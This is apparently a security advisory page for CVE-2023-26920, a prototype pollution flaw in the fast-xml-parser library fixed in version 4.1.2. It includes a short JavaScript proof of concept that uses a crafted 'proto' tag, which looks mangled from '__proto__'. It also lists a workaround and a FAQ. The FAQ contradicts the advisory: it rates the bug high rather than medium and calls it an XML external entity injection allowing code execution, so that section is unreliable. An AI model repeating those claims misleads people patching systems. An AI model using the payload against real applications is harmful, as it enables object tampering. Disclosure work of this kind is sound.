CVE-2023-26920: Medium severity NaturalIntelligence Fast Xml Parser vulnerability
Impact As a part of this vulnerability, user was able to se code using proto as a tag or attribute name.
js const { XMLParser, XMLBuilder, XMLValidator} = require("fast-xml-parser");
let XMLdata = "<proto><polluted>hacked</polluted></proto>"
const parser = new XMLParser(); let jObj = parser.parse(XMLdata);
console.log(jObj.polluted) // should return hacked
Patches The problem has been patched in v4.1.2
Workarounds User can check for "proto" in the XML string before parsing it to the parser.
References https://gist.github.com/Sudistark/a5a45bd0804d522a1392cb5023aa7ef7
Other sources
fast-xml-parser before 4.1.2 allows proto for Prototype Pollution.
Affected Software
Remediation
Event History
Frequently Asked Questions
What is the severity of CVE-2023-26920?
The severity of CVE-2023-26920 is considered high due to its ability to allow code execution via XML parsing.
How do I fix CVE-2023-26920?
To fix CVE-2023-26920, upgrade the fast-xml-parser package to version 4.1.2 or later.
What type of vulnerability is CVE-2023-26920?
CVE-2023-26920 is an XML external entity injection vulnerability that affects user input processing.
Which software versions are affected by CVE-2023-26920?
CVE-2023-26920 affects all versions of the fast-xml-parser package prior to version 4.1.2.
What are the potential impacts of CVE-2023-26920?
The potential impacts of CVE-2023-26920 include unauthorized code execution and data manipulation through crafted XML input.